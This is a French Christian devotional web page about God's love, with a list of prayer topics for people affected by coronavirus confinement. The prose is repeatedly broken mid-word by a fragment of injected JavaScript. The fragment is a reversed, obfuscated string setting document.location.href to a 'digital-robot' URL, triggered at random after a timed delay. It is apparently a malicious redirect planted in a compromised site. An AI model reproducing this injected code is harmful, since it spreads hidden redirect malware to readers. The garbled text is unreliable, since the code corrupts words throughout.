La Parole de Dieu nous déclare que Dieu est Amour. C’est une vérité intemporelle et éternelle. Elle n’a rien à voir avec les circonstances que nous passons ou les situations que nous traversons. L’Amour est l’essence même de Dieu.
Malheureusement, beaucoup de gens aujourd’hui pensent qu’Il est responsable de tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toutes les calamités qui nous arrivent. Pourtant, l’œuvre de rédemption accomplie par Jésus sur la croix du Calvaire est l’expression maximale de cet Amour. Car « Dieu a tant aimé le monde qu’Il a donné Son Fils… ». Et, de même, Le Fils a tant aimé le monde qu’Il a donné Sa vie ! « …afin que quiconque croit en lui ne périsse pas, mais qu’il ait la vie éternelle. » (Jean 3 : 16)
Ainsi, nous-mêmes, qui avons rencontré ce Dieu extraordinaire, nous sommes encouragés à exprimer cet Amour dans notre vie de tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tous les jours et ensuite à le partager avec ceux qui ne le connaissent pas.
Mais comment pouvons-nous communiquer cet amour ?
Tout d’abord, il est nécessaire de faire de notre relation avec le Seigneur la priorité n°1 de notre vie. Sans Lui nous ne pouvons pas aimer. Puis, si nous aimons, nous pardonnerons à ceux qui nous ont offensés. Nous irons vers notre prochain, celui qui est différent, qui pense autrement, celui qui fait preuve d’immaturité ou qui n’a pas un comportement agréable. Nous serons cette oreille qui écoutera, cette épaule sur laquelle on pourra pleurer, ce cœur compatissant qui consolera, cette main qui relèvera.
Mais si nous aimons, nous mettrons aussi en pratique la parole de l’apôtre Paul : « J’exhorte donc, avant tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toutes choses, à faire des prières, des supplications, des requêtes, des actions de grâces, pour tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tous les hommes, pour les rois et pour tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tous ceux qui sont élevés en dignité, afin que nous menions une vie paisible et tranquille, en tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toute piété et honnêteté. Cela est bon et agréable devant Dieu notre Sauveur, qui veut que tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tous les hommes soient sauvés et parviennent à la connaissance de la vérité. » (1 Tim. 2 : 1-4)
Le cœur de Dieu pleure pour tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tous les êtres humains qui ne le connaissent pas. Et plus que jamais, Il a besoin de son peuple pour faire connaître Son Amour incomparable à ce monde ébranlé et pour intercéder sans relâche jusqu’à l’obtention des réponses à ses prières.
Sujets de prière
– Prions pour nos frères et sœurs en Christ, pour tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tous ceux qui souffrent du confinement, pour les personnes seules, pour les familles fatiguées et éprouvées,
– Pour que Dieu protège tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tous ceux qui sont obligés d’aller travailler,
– Pour la consolation des familles tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}touchées par le deuil et la maladie.
– Prions pour que nous communiquions la paix à nos proches qui sont loin de nous.
– Pour nos voisins non-croyants, afin que notre vie les encourage et les fortifie.
– Continuons à prier pour nos autobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torités, les forces de l’ordre et le personnel médical tant sur le plan local que national.
– Prions aussi pour les autres pays durement tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}touchés par l’épidémie du coronavirus, comme l’Italie, L’Espagne et maintenant les Etats-Unis.
– N’oublions pas Israël, qui non seulement doit gérer la crise sanitaire mais doit aussi faire face à des attaques terroristes.
Nous utilisons des cookies pour vous garantir la meilleure expérience sur notre site. Si vous continuez à utiliser ce dernier, nous considérerons que vous acceptez l'utilisation des cookies.Ok